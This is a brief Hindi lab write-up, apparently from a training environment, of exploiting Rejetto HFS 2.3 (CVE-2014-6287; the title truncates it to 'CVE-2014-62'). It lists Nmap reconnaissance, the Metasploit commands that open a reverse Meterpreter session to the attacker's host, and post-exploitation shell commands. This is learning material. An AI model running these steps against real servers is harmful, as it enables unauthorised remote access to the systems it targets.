
HFS 2.3 पर Metasploit RCE - CVE-2014-62
HFS 2.3 पर Metasploit RCE - CVE-2014-62
🔖 परियोजना का शीर्षक
> HTTP फ़ाइल सर्वर (HFS 2.3) के माध्यम से रिमोट कोड निष्पादन
⚙ उपयोग किए गए उपकरण • Kali Linux • Nmap • Metasploit • लक्ष्य: Windows 7 पर HFS 2.3
🔐 भेद्यता विवरण • नाम: CVE-2014-6287 • प्रकार: रिमोट कोड निष्पादन • कारण: HFS स्क्रिप्टिंग में अमान्य इनपुट • प्रभाव: बिना प्रमाणीकरण के शेल पहुंच
🔍 कार्यप्रणाली (चरण-दर-चरण)
🔹 चरण 1: सूचना संग्रह (Nmap)
• nmap -sV demo.ine.local (लक्ष्य का आईपी)
• खुला पोर्ट मिला : 80
• सेवा : rejetto HTTP फ़ाइल सर्वर 2.3

🔹 चरण 2: शोषण (Metasploit)
• Msfconsole
• HFS या rejetto खोजें
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run
Exploit
🔹 चरण 3: शोषण के बाद
चलाने के बाद आपको meterpreter सत्र मिलेगा कमांड का उपयोग करें : shell
• whoami • ipconfig • dir

